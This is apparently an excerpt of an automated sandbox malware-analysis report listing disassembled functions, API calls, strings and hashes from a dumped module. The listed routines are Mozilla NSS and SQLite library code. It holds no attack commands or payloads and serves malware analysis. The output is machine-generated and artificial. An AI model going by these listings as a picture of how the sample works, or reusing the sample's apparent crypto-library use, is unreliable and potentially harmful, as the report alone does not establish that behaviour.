                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: memset$memcpy$Unlock$AllocateArenaCriticalEnterSectionValuecallocfree
                                                                                • String ID:
                                                                                • API String ID: 1569127702-0
                                                                                • Opcode ID: a2bf5a5e4062298121592b0605a57bb808c47bce217cb21f9fe1ee44537ed216
                                                                                • Instruction ID: efbf4a0ab38d27a078830cd8c5c4c14caad25fd3177ecc5ab6d56ae1c1c14684
                                                                                • Opcode Fuzzy Hash: a2bf5a5e4062298121592b0605a57bb808c47bce217cb21f9fe1ee44537ed216
                                                                                • Instruction Fuzzy Hash: A051B4B2F002169FE7009F68CC85A6FB7B9EF45758B15452AEC089B600E731ED45C7E2
                                                                                APIs
                                                                                • memcpy.VCRUNTIME140(?,?,?), ref: 6CF3DD56
                                                                                • memcpy.VCRUNTIME140(0000FFFE,?,?), ref: 6CF3DD7C
                                                                                • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6CF3DE67
                                                                                • memcpy.VCRUNTIME140(0000FFFC,?,?), ref: 6CF3DEC4
                                                                                • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CF3DECD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy$_byteswap_ulong
                                                                                • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                • API String ID: 2339628231-598938438
                                                                                • Opcode ID: c96f447278088d5d38f3da8e02fe0a42af9b71ef2d34b5a582b467048614062f
                                                                                • Instruction ID: 7498a65276e37afea1474f33d6b2b7f74c252c7d0d636c333a9bb5b12e424b9a
                                                                                • Opcode Fuzzy Hash: c96f447278088d5d38f3da8e02fe0a42af9b71ef2d34b5a582b467048614062f
                                                                                • Instruction Fuzzy Hash: 27A1F471614221AFD711CF29C880B6BBBF5AF85308F15992DE88D8BA41D730E955CBD2
                                                                                APIs
                                                                                • PORT_Alloc_Util.NSS3(?), ref: 6CFFEE0B
                                                                                  • Part of subcall function 6D010BE0: malloc.MOZGLUE(6D008D2D,?,00000000,?), ref: 6D010BF8
                                                                                  • Part of subcall function 6D010BE0: TlsGetValue.KERNEL32(6D008D2D,?,00000000,?), ref: 6D010C15
                                                                                • PR_SetError.NSS3(FFFFE013,00000000), ref: 6CFFEEE1
                                                                                  • Part of subcall function 6CFF1D50: TlsGetValue.KERNEL32(00000000,-00000018), ref: 6CFF1D7E
                                                                                  • Part of subcall function 6CFF1D50: EnterCriticalSection.KERNEL32(?), ref: 6CFF1D8E
                                                                                  • Part of subcall function 6CFF1D50: PR_Unlock.NSS3(?), ref: 6CFF1DD3
                                                                                • TlsGetValue.KERNEL32 ref: 6CFFEE51
                                                                                • EnterCriticalSection.KERNEL32(?), ref: 6CFFEE65
                                                                                • PR_Unlock.NSS3(?), ref: 6CFFEEA2
                                                                                • free.MOZGLUE(?), ref: 6CFFEEBB
                                                                                • PR_SetError.NSS3(00000000,00000000), ref: 6CFFEED0
                                                                                • PR_Unlock.NSS3(?), ref: 6CFFEF48
                                                                                • free.MOZGLUE(?), ref: 6CFFEF68
                                                                                • PR_SetError.NSS3(00000000,00000000), ref: 6CFFEF7D
                                                                                • PK11_DoesMechanism.NSS3(?,?), ref: 6CFFEFA4
                                                                                • free.MOZGLUE(?), ref: 6CFFEFDA
                                                                                • PR_SetError.NSS3(FFFFE040,00000000), ref: 6CFFF055
                                                                                • free.MOZGLUE(?), ref: 6CFFF060
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: Errorfree$UnlockValue$CriticalEnterSection$Alloc_DoesK11_MechanismUtilmalloc
                                                                                • String ID:
                                                                                • API String ID: 2524771861-0
                                                                                • Opcode ID: f77e0143628cbc4547ee94ae372c2f7e84e941fb7a2d23c3d494f68070c2c389
                                                                                • Instruction ID: 9d9110d6c0b42e0937279c4b1a3d467d8478945f4cf8f36dbbf9f355dcf53684
                                                                                • Opcode Fuzzy Hash: f77e0143628cbc4547ee94ae372c2f7e84e941fb7a2d23c3d494f68070c2c389
                                                                                • Instruction Fuzzy Hash: 408193B1A00209AFEF00DFA5EC81BDE7BB5FF08308F054024E919A3651E771E925CBA1
                                                                                APIs
                                                                                • PK11_SignatureLen.NSS3(?), ref: 6CFC4D80
                                                                                • PORT_Alloc_Util.NSS3(00000000), ref: 6CFC4D95
                                                                                • PORT_NewArena_Util.NSS3(00000800), ref: 6CFC4DF2
                                                                                • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CFC4E2C
                                                                                • PR_SetError.NSS3(FFFFE028,00000000), ref: 6CFC4E43
                                                                                • PORT_NewArena_Util.NSS3(00000800), ref: 6CFC4E58
                                                                                • SGN_CreateDigestInfo_Util.NSS3(00000001,?,?), ref: 6CFC4E85
                                                                                • DER_Encode_Util.NSS3(?,?,6D1105A4,00000000), ref: 6CFC4EA7
                                                                                • PK11_SignWithMechanism.NSS3(?,-00000001,00000000,?,?), ref: 6CFC4F17
                                                                                • DSAU_EncodeDerSigWithLen.NSS3(?,?,?), ref: 6CFC4F45
                                                                                • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CFC4F62
                                                                                • PORT_FreeArena_Util.NSS3(?,00000001), ref: 6CFC4F7A
                                                                                • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CFC4F89
                                                                                • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CFC4FC8
                                                                                Similarity
                                                                                • API ID: Util$Arena_$ErrorFreeItem_K11_WithZfree$Alloc_CreateDigestEncodeEncode_Info_MechanismSignSignature
                                                                                • String ID:
                                                                                • API String ID: 2843999940-0
                                                                                • Opcode ID: 1ac5de30223423b030f715ccafb2cb56f7bf95f4f1622c32c8d0df6fe1db6955
                                                                                • Instruction ID: 42c4abea84860f54553aae3909891114fd5b425559ceafe2706de3a09cfa04d7
                                                                                • Opcode Fuzzy Hash: 1ac5de30223423b030f715ccafb2cb56f7bf95f4f1622c32c8d0df6fe1db6955
                                                                                • Instruction Fuzzy Hash: 37818F72B08302AFE701CF65DC40B6BBBE8AB84358F158529F958DB641E771E904CB93
                                                                                APIs
                                                                                • SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?), ref: 6D005C9B
                                                                                • PR_SetError.NSS3(FFFFE043,00000000,?,?,?,?,?), ref: 6D005CF4
                                                                                • SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?), ref: 6D005CFD
                                                                                • PR_smprintf.NSS3(tokens=[0x%x=<%s>],00000004,00000000,?,?,?,?,?,?), ref: 6D005D42
                                                                                • free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?), ref: 6D005D4E
                                                                                • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6D005D78
                                                                                • PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?), ref: 6D005E18
                                                                                • TlsGetValue.KERNEL32 ref: 6D005E5E
                                                                                • EnterCriticalSection.KERNEL32(?), ref: 6D005E72
                                                                                • PR_Unlock.NSS3(?), ref: 6D005E8B
                                                                                  • Part of subcall function 6CFFF820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6CFFF854
                                                                                  • Part of subcall function 6CFFF820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6CFFF868
                                                                                  • Part of subcall function 6CFFF820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6CFFF882
                                                                                  • Part of subcall function 6CFFF820: free.MOZGLUE(04C483FF,?,?), ref: 6CFFF889
                                                                                  • Part of subcall function 6CFFF820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6CFFF8A4
                                                                                  • Part of subcall function 6CFFF820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6CFFF8AB
                                                                                  • Part of subcall function 6CFFF820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6CFFF8C9
                                                                                  • Part of subcall function 6CFFF820: free.MOZGLUE(280F10EC,?,?), ref: 6CFFF8D0
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: free$CriticalSection$Delete$DestroyErrorModule$EnterR_smprintfUnlockValue
                                                                                • String ID: d$tokens=[0x%x=<%s>]
                                                                                • API String ID: 2028831712-1373489631
                                                                                • Opcode ID: b34ee68fb9dc37717548bf646cda6e68032c3f3a295f9de48fb51838dacb86c2
                                                                                • Instruction ID: 23455d8e7517da3d4f373460ccf01e6c2514bb835f304cc854e7a32df35d2c55
                                                                                • Opcode Fuzzy Hash: b34ee68fb9dc37717548bf646cda6e68032c3f3a295f9de48fb51838dacb86c2
                                                                                • Instruction Fuzzy Hash: AF71C5B8E04106BBFB159B24ED49B7E36B9FF45308F044035E9099B242EB71E915CB92
                                                                                APIs
                                                                                • PR_SetError.NSS3(FFFFE005,00000000), ref: 6D041D6B
                                                                                • PK11_FreeSymKey.NSS3(00000000), ref: 6D041D75
                                                                                • PORT_ZAlloc_Util.NSS3(00000028), ref: 6D041DC4
                                                                                • memcpy.VCRUNTIME140(?,?,?), ref: 6D041DFC
                                                                                • PK11_CreateContextBySymKey.NSS3(00000000,82000104,?,?), ref: 6D041EB1
                                                                                • PK11_CreateContextBySymKey.NSS3(00000000,82000105,?,?), ref: 6D041ECE
                                                                                • PK11_FreeSymKey.NSS3 ref: 6D041EE0
                                                                                • PK11_FreeSymKey.NSS3(00000000), ref: 6D041EF9
                                                                                • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6D041F0A
                                                                                • PK11_DestroyContext.NSS3(?,00000001), ref: 6D041F1C
                                                                                • free.MOZGLUE(00000000), ref: 6D041F25
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: K11_$Context$Free$CreateDestroy$Alloc_ErrorUtilfreememcpy
                                                                                • String ID: iv
                                                                                • API String ID: 3943584448-1283462680
                                                                                • Opcode ID: 88153bf7d365dea184a6bd3a04e97c176cf537658baa79000ac8e82101011468
                                                                                • Instruction ID: 2dd833f00dc274ac2c99da7080dc77552e79a6da3cbed584b71420a0393711fa
                                                                                • Opcode Fuzzy Hash: 88153bf7d365dea184a6bd3a04e97c176cf537658baa79000ac8e82101011468
                                                                                • Instruction Fuzzy Hash: F76190B5A08201EBE715DF15DC40FABB7E8EF88304F05852DF99887251E730E965CBA2
                                                                                APIs
                                                                                • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6CFF781D,00000000,6CFEBE2C,?,6CFF6B1D,?,?,?,?,00000000,00000000,6CFF781D), ref: 6CFF6C40
                                                                                • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6CFF781D,?,6CFEBE2C,?), ref: 6CFF6C58
                                                                                • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6CFF781D), ref: 6CFF6C6F
                                                                                • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6CFF6C84
                                                                                • PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6CFF6C96
                                                                                  • Part of subcall function 6CFA1240: TlsGetValue.KERNEL32(00000040,?,6CFA116C,NSPR_LOG_MODULES), ref: 6CFA1267
                                                                                  • Part of subcall function 6CFA1240: EnterCriticalSection.KERNEL32(?,?,?,6CFA116C,NSPR_LOG_MODULES), ref: 6CFA127C
                                                                                  • Part of subcall function 6CFA1240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6CFA116C,NSPR_LOG_MODULES), ref: 6CFA1291
                                                                                  • Part of subcall function 6CFA1240: PR_Unlock.NSS3(?,?,?,?,6CFA116C,NSPR_LOG_MODULES), ref: 6CFA12A0
                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6CFF6CAA
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: strncmp$CriticalEnterSectionSecureUnlockValuegetenvstrcmp
                                                                                • String ID: NSS_DEFAULT_DB_TYPE$dbm$dbm:$extern:$rdb:$sql:
                                                                                • API String ID: 4221828374-3736768024
                                                                                • Opcode ID: 71bc0b18c752e10493dbd6b8540b357aa4000ba75fa1f0c05143b8511ce2845a
                                                                                • Instruction ID: 439acf1fabb703a319fc764cfeeb1d918f9a4b6eeb37812a815ae12fece8151f
                                                                                • Opcode Fuzzy Hash: 71bc0b18c752e10493dbd6b8540b357aa4000ba75fa1f0c05143b8511ce2845a
                                                                                • Instruction Fuzzy Hash: 4D01F2A1B4232167F60027796C5AF27355DDF8514AF140131FF58E01A2EFE2E51640B6
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: free$Unlock$ErrorValuecallocmallocmemcpystrcpystrlen
                                                                                • String ID:
                                                                                • API String ID: 786543732-0
                                                                                • Opcode ID: 70885f5d9365abd680f13787afd15f866d0f058586752d3db30ea9da70655fc7
                                                                                • Instruction ID: a81d771d91d3169a9cf993268f03d5c434a82393f880e835bda989401aba27d0
                                                                                • Opcode Fuzzy Hash: 70885f5d9365abd680f13787afd15f866d0f058586752d3db30ea9da70655fc7
                                                                                • Instruction Fuzzy Hash: 0A51AFB1901116CBEB00DF94ED827AFF7B5EB46308F140129D915A3600E7B2A95ACFE2
                                                                                APIs
                                                                                • PR_LogPrint.NSS3(C_MessageSignInit), ref: 6CFEADE6
                                                                                • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CFEAE17
                                                                                • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CFEAE29
                                                                                  • Part of subcall function 6D0CD930: PL_strncpyz.NSS3(?,?,?), ref: 6D0CD963
                                                                                • PR_LogPrint.NSS3(?,00000000), ref: 6CFEAE3F
                                                                                • PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6CFEAE78
                                                                                • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CFEAE8A
                                                                                • PR_LogPrint.NSS3(?,00000000), ref: 6CFEAEA0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: L_strncpyzPrint$L_strcatn
                                                                                • String ID: hKey = 0x%x$ hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageSignInit
                                                                                • API String ID: 332880674-605059067
                                                                                • Opcode ID: 9352148266067b1c0c73ce4e152a9454ea34fae12c9e1e6f619f471b4aaaa2aa
                                                                                • Instruction ID: c6adef92000cf1e88da0c155ef677528339d5dab7abf6386ce9c489b8d513c3e
                                                                                • Opcode Fuzzy Hash: 9352148266067b1c0c73ce4e152a9454ea34fae12c9e1e6f619f471b4aaaa2aa
                                                                                • Instruction Fuzzy Hash: FE311872900204BBEB10DF55ED86BAF3BB5EB4A309F054029F5196B252DBB49904CBA2
                                                                                APIs
                                                                                • sqlite3_value_text16.NSS3(?), ref: 6D084CAF
                                                                                • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6D084CFD
                                                                                • sqlite3_value_text16.NSS3(?), ref: 6D084D44
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: sqlite3_value_text16$sqlite3_log
                                                                                • String ID: API call with %s database connection pointer$abort due to ROLLBACK$another row available$bad parameter or other API misuse$invalid$no more rows available$out of memory$unknown error
                                                                                • API String ID: 2274617401-4033235608
                                                                                • Opcode ID: c6069033e231b674ddfe3388458b252d64f8d9fec4d8f9322cedac7b174dc462
                                                                                • Instruction ID: b8618e4d84f7541b011c48e199501bee8eb8226cc3664650d5df7957bcff3936
                                                                                • Opcode Fuzzy Hash: c6069033e231b674ddfe3388458b252d64f8d9fec4d8f9322cedac7b174dc462
                                                                                • Instruction Fuzzy Hash: FF3127B2E14A52BBFF054A24A8007B9B3AFB78E314F45412AD4244B35BDB61E81683D3
                                                                                APIs
                                                                                • PR_LogPrint.NSS3(C_InitPIN), ref: 6CFE2DF6
                                                                                • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CFE2E24
                                                                                • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CFE2E33
                                                                                  • Part of subcall function 6D0CD930: PL_strncpyz.NSS3(?,?,?), ref: 6D0CD963
                                                                                • PR_LogPrint.NSS3(?,00000000), ref: 6CFE2E49
                                                                                • PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6CFE2E68
                                                                                • PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6CFE2E81
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: Print$L_strncpyz$L_strcatn
                                                                                • String ID: hSession = 0x%x$ pPin = 0x%p$ ulPinLen = %d$ (CK_INVALID_HANDLE)$C_InitPIN
                                                                                • API String ID: 1003633598-1777813432
                                                                                • Opcode ID: efef950e9e34fdc53d9f4153c1ff6390388c5b33120c50e4052574b943597c62
                                                                                • Instruction ID: bd36945a7d64053de30a3cac0dd77708fa54196e29a2111ee477b0e3a7944e95
                                                                                • Opcode Fuzzy Hash: efef950e9e34fdc53d9f4153c1ff6390388c5b33120c50e4052574b943597c62
                                                                                • Instruction Fuzzy Hash: D0315AB1901215FFEB10DB55ED4AB9F3775EB4A31CF084025F918A7252EBB18904CBA2
                                                                                APIs
                                                                                • sqlite3_initialize.NSS3 ref: 6D082D9F
                                                                                  • Part of subcall function 6CF3CA30: EnterCriticalSection.KERNEL32(?,?,?,6CF9F9C9,?,6CF9F4DA,6CF9F9C9,?,?,6CF6369A), ref: 6CF3CA7A
                                                                                  • Part of subcall function 6CF3CA30: LeaveCriticalSection.KERNEL32(?), ref: 6CF3CB26
                                                                                • sqlite3_exec.NSS3(?,?,6D082F70,?,?), ref: 6D082DF9
                                                                                • sqlite3_free.NSS3(00000000), ref: 6D082E2C
                                                                                • sqlite3_free.NSS3(?), ref: 6D082E3A
                                                                                • sqlite3_free.NSS3(?), ref: 6D082E52
                                                                                • sqlite3_mprintf.NSS3(6D0EAAF9,?), ref: 6D082E62
                                                                                • sqlite3_free.NSS3(?), ref: 6D082E70
                                                                                • sqlite3_free.NSS3(?), ref: 6D082E89
                                                                                • sqlite3_free.NSS3(?), ref: 6D082EBB
                                                                                • sqlite3_free.NSS3(?), ref: 6D082ECB
                                                                                • sqlite3_free.NSS3(00000000), ref: 6D082F3E
                                                                                • sqlite3_free.NSS3(?), ref: 6D082F4C
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_free$CriticalSection$EnterLeavesqlite3_execsqlite3_initializesqlite3_mprintf
                                                                                • String ID:
                                                                                • API String ID: 1957633107-0
                                                                                • Opcode ID: 2a59e760c2ff7fca9ab70b173bbe5c1c46575f70dbb4676f2fd856d80adf35ee
                                                                                • Instruction ID: e4362a4f5d5e0a82233f0fa98b84a1b3bfe7d3d67888f89e6bda50c7e028e3b0
                                                                                • Opcode Fuzzy Hash: 2a59e760c2ff7fca9ab70b173bbe5c1c46575f70dbb4676f2fd856d80adf35ee
                                                                                • Instruction Fuzzy Hash: 2B615DB5E002169BEF10CF68D880BEEBBF1AF48358F154024ED55A7342EB75E945CBA1
                                                                                APIs
                                                                                • TlsGetValue.KERNEL32(6CFD3F23,?,6CFCE477,?,?,?,00000001,00000000,?,?,6CFD3F23,?), ref: 6CFD2C62
                                                                                • EnterCriticalSection.KERNEL32(0000001C,?,6CFCE477,?,?,?,00000001,00000000,?,?,6CFD3F23,?), ref: 6CFD2C76
                                                                                • PL_HashTableLookup.NSS3(00000000,?,?,6CFCE477,?,?,?,00000001,00000000,?,?,6CFD3F23,?), ref: 6CFD2C86
                                                                                • PR_Unlock.NSS3(00000000,?,?,?,?,6CFCE477,?,?,?,00000001,00000000,?,?,6CFD3F23,?), ref: 6CFD2C93
                                                                                  • Part of subcall function 6D05DD70: TlsGetValue.KERNEL32 ref: 6D05DD8C
                                                                                  • Part of subcall function 6D05DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6D05DDB4
                                                                                • TlsGetValue.KERNEL32(?,?,?,?,?,6CFCE477,?,?,?,00000001,00000000,?,?,6CFD3F23,?), ref: 6CFD2CC6
                                                                                • EnterCriticalSection.KERNEL32(0000001C,?,?,?,?,?,6CFCE477,?,?,?,00000001,00000000,?,?,6CFD3F23,?), ref: 6CFD2CDA
                                                                                • PL_HashTableLookup.NSS3(00000000,?,?,?,?,?,?,6CFCE477,?,?,?,00000001,00000000,?,?,6CFD3F23), ref: 6CFD2CEA
                                                                                • PR_Unlock.NSS3(00000000,?,?,?,?,?,?,?,6CFCE477,?,?,?,00000001,00000000,?), ref: 6CFD2CF7
                                                                                • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,6CFCE477,?,?,?,00000001,00000000,?), ref: 6CFD2D4D
                                                                                • EnterCriticalSection.KERNEL32(?), ref: 6CFD2D61
                                                                                • PL_HashTableLookup.NSS3(?,?), ref: 6CFD2D71
                                                                                • PR_Unlock.NSS3(?), ref: 6CFD2D7E
                                                                                  • Part of subcall function 6CFA07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CF3204A), ref: 6CFA07AD
                                                                                  • Part of subcall function 6CFA07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CF3204A), ref: 6CFA07CD
                                                                                  • Part of subcall function 6CFA07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CF3204A), ref: 6CFA07D6
                                                                                  • Part of subcall function 6CFA07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CF3204A), ref: 6CFA07E4
                                                                                  • Part of subcall function 6CFA07A0: TlsSetValue.KERNEL32(00000000,?,6CF3204A), ref: 6CFA0864
                                                                                  • Part of subcall function 6CFA07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CFA0880
                                                                                  • Part of subcall function 6CFA07A0: TlsSetValue.KERNEL32(00000000,?,?,6CF3204A), ref: 6CFA08CB
                                                                                  • Part of subcall function 6CFA07A0: TlsGetValue.KERNEL32(?,?,6CF3204A), ref: 6CFA08D7
                                                                                  • Part of subcall function 6CFA07A0: TlsGetValue.KERNEL32(?,?,6CF3204A), ref: 6CFA08FB
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: Value$CriticalSection$EnterHashLookupTableUnlock$calloc$Leave
                                                                                • String ID:
                                                                                • API String ID: 2446853827-0
                                                                                • Opcode ID: eab2ef3c2d08248bedf0a9264b9fe08041fc8f3082b866815c1c1dc341852bed
                                                                                • Instruction ID: e64ba08122f745a61ecaa74a6211820660576d4c511adbc1a399dcab38f61b6b
                                                                                • Opcode Fuzzy Hash: eab2ef3c2d08248bedf0a9264b9fe08041fc8f3082b866815c1c1dc341852bed
                                                                                • Instruction Fuzzy Hash: CB51D576D00105ABEB009F24EC45AAAB778FF15258B198524ED1897B11EB32FE64CBE1
                                                                                APIs
                                                                                • PR_CallOnce.NSS3(6D112120,Function_00097E60,?,?,?,?,?,6D03F9CF,6D03FAD0,00000000), ref: 6CFC7C81
                                                                                  • Part of subcall function 6CF34C70: TlsGetValue.KERNEL32(?,?,?,6CF33921,6D1114E4,6D07CC70), ref: 6CF34C97
                                                                                  • Part of subcall function 6CF34C70: EnterCriticalSection.KERNEL32(?,?,?,?,6CF33921,6D1114E4,6D07CC70), ref: 6CF34CB0
                                                                                  • Part of subcall function 6CF34C70: PR_Unlock.NSS3(?,?,?,?,?,6CF33921,6D1114E4,6D07CC70), ref: 6CF34CC9
